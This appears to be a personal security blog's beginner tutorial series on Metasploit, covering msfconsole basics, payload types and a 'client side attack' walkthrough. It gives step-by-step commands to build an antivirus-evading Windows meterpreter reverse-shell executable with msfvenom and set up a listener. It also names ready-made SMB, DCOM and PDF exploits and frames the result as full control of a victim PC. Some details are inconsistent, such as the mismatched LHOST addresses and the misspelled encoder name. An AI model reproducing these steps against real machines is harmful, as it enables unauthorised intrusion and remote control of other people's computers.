Client Side Attacks

If you are viewing this post then you should atleast got your own kali linux machine with you.
Assuming that you got your machine with you I was not uploading any reference Images.

As already mentioned

Attackers IP :10.4.33.3 [kali linux OS]

Victims IP    :10.4.33.8  [ Any Windows OS, use xp or 7 for  less complications]

The payload we use is windows/meterpreter/reverse_tcp

We already seen how to generate a payload but for now we are using msfvenom for creating a payload as it was a new update in kali linux 2 sana version.

Type this command in root terminal msfvenom -h

msfvenom

By looking the above help table we can create a payload

-p :specifying our payload

-a :arch

–platform : For mentioning the victims OS

-e : encoder, evading a infamous or unpaid antivirus system including windowsdefender

-f : format of the output file it may be .bat or .exe for windows .elf for linux etc.

-o : To save the output file at a defined location

Now getting our payload
I already mentioned you that there will be a several variables in a payload that are need to be defined before generating it.
You can know about those variables in metasploit by using the command show options

Finding Variables

  • Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options 

Now you can see the list of variables needed ie LHOST LPORT.

Keep this terminal open we will get to this terminal again

Open up a new terminal and use this command for creating a payload

  • Terminal 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=10.4.33.4 LPORT=3456 -e x86/shikta_ga_nai -f exe -o /root/Desktop/payload.exe

Here LHOST = our ip we can find it by using a terminal command [ifconfig]

LPORT = any port but remember the port.

After running this command successfully you can see a payload.exe file on your desktop.

Now you can close this second terminal.

Come back to our Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options      [till here it was done already]

set LHOST 10.4.33.3    [our IP not the victims IP]

set LPORT 3456   [this is the reason we need to remember the port we used before]

set ExitOnSessions false   [Adavanced command no need to use, but its better if the attck was going on several machines]

exploit or exploit -j 

Remember if you use the -j [jobs tag] the meterpreter session will not be displayed directly, it will be assigned in a serial way to each session.
like first victim to session 1 and next to session 2 and follows.

So in the same terminal you need to use this extra command sessions -i 1 for interacting with 1 session ie operating 1 victim.

For this to be happen, the payload.exe file should be run in the victims PC, sending that file to the victims PC is One of a different task, but for now to get some information you just upload it in the victims PC and Run the file.

Terminal 1 should not be closed as that is the terminal of victim now after all these commands in an order.

It should look like this.

finalg

Here according to this image 192.168.222.135 is attacker and 192.168.222.137 is the victim.

And now you can see the meterpreter terminal, if you can see that, which means the PC with the IP above was now under your control.
It was hacked you can do what ever you want.

But disadvantages of this way

  1. We need to deliver the payload to victim [payload.exe] .
  2. A good antivirus can detect this.
  • Evading Antivirus Detection

you can evade almost any antivirus by creating your payload from veilevasion

there will be a different blog for that.

  • Delivering the Payload

This has some awesome techniques to do, but for now just send the files by your own

I can mention you some of the exploits that doesn’t need to deliver the payload

  1. exploit/windows/dcerpc/ms03_026_dcom [dcerpc vulnerability]
  2. exploit/windows/smb/ms08_067_netapi   [smb vulnerability]

But these are vulnerability specific  and both had a common variable RHOST , where you need to set the RHOST to 10.4.33.8 ie set RHOST 10.4.33.8 [victims ip]

There are some exploits that can be attached to PDFs and XL files

exploit/windows/fileformat/adobe_utilprintf

It varies according to the situation but what my aim is to not let you in any confusion and misconception.

Doubts and suggestions can be commented below.

 

Metasploit Fundamentals

  • Basic commands of Metasploit
  • Payload types
  • Generating payloads in Metasploit

Basic Commands of Metasploit

In this article we will be talking about the very basics of Metasploit and the Metasploit commands used in the command line interface.

Before Knowing the commands of metasploit first be aware about your system updates, These are some necessary commands to update your OS.
apt-get update

apt-get upgrade

apt-get dist-upgrade

Dont ever try to update metasploit with the command Msfupdate whithout knowing what you are going to do.

You can open metasploit by using the terminal command msfconsole which will open up with a metasploit banner as belowmsfconsole

Now we are in msfconole which can be nicknamed as metasploit terminal or console,
every command related to metasplot should be executed here.
list of some commands and what they do.

*every command will be bold and Italic [ command ] in this blog

help

You can further refine your searches by using the built-in keyword system.help

set

The ‘set’ command allows you to configure Framework options and parameters for the current module you are working with.

set

auxiliary

Executing ‘show auxiliary’ will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

auxilary

exploits

Naturally, ‘show exploits’ will be the command you are most interested in running since at its core, Metasploit is all about exploitation. Run ‘show exploits’ to get a listing of all exploits contained in the framework.

exploits

Payloads

Running ‘show payloads’ will display all of the different payloads for all platforms available within Metasploit.

payload

use

The ‘use’ command changes your context to a specific module, exposing type-specific commands.

use

exit 

This command takes back to your root terminal or the default terminal.

exit

These are some basic commands.

Now how to use an exploit in metasploit, assuming we know what exploit we want to use. In further we will discuss what are the very useful and commonly used exploits.

use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index 

This is the exploit and use the command ‘use’ to select it then you can see some considerable changes in the msfconsole in a way that a particular exploit was selected.

followed by these commands to clear if any necessary and set them with the set command

show targets : provides you the info about what type of machine can be attacked

show payload : Show you the list of payloads that will be valid for this chosen exploit

Now set  the required payload with the set command from the list of shown payloads from the command show payload . 

exset payload windows/meterpreter/reverse_tcp          where “windows/meterpreter/reverse_tcp” is one of the payloads in the list of show payload.

show options : After setting the payload, this command will provide you the info about the necessary details required to fill the variable that are present in our selected payload.

ex : If “x” is a variable that should be fulfilled our payload before execution,                  show options will provide you a info about “x” by using this you will never struck in an error before executing the code.

show advanced : Similar to show options but some advanced, but without setting this will not lead to any error.

show evasion ; Similar to show options.

  • Payload types.

There are many types of payload

  1. Inline (Non Staged)
  2. Staged
  3. Meterpreter
  4. PassiveX
  5. NoNX
  6. Ord
  7. Ipv6
  8. Reflection Dll Injection

All these types are not necessary to explain now, But if someone is interested you can contact me.

For now we will just concentrate with the Meterpreter type payloads.

 Meterpreter :The short form of Meta-Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required.

  • Generating Payloads in Metasploit

Payloads can be generated in Metasploit by the following commands from your root terminal

  1. msfconsole  : Takes us to metasploit termnal from root terminal
  2. search payload : Lists us a lot of payload and select a useful payload for your attack, you can learn about payloads later, for now we are using some random payload.
  3. use payload/windows/shell_bind_tcp : After selecting a payload select it by using the command ‘use’
  4. generate : Which will generate you a raw code which can be even generated in many ways by using the command below.
  5. By using tags of generate -h which will list you a lot of external tags similar to “-h”

You can even generate payloads in many ways,you can use socialengineeringtoolkit, the command for that is setoolkit in root terminal, but the way we generate is a bit different.

There are many other external ways too,

like Veilevasion, this is on of the greatest way to create an antivirus undetected payload, we will look about these in detail later.

I guess for now you are able to create your own payload given the name of the payload, remember some payloads need to be filled with the necessary variables, so never forget to use the command show options after selecting the payload, In the previous generated payload by us there are no any predefined variables so, I never checked it.

After a lot of practice and usage you will be capable of selecting a payload just with the situation and you will be aware of the variables too.

My contact details.
gmail: kaparapu.akhilnaidu@gmil.com

facebook: https://www.facebook.com/kaparapu.akhilnaidu

For any doubts and suggestions comment below.

Network and Security

This Blog is to guide you in a right direction for your future in Network and security related career.
I got many personal emails asking me to write a  blog after my YouTube channel was blocked, At that time It is a bit more work for me to write a blog without any preparation, So I started exploring more and more on cyber security, I used to attend a lot of workshops conducted all over India and myself I conducted a series of workshops in IIT Guwahati.

As for now I can start my own series of lectures through this blog.
In this lecture series we will be Using Kali linux as Our operating System [Attacker machine] and Windows operating system [Victim]

Our First Lecture is on Metasploit

This Post will be updated regularly with a direct link below within the index itself.

Doubts and suggestions can be commented below.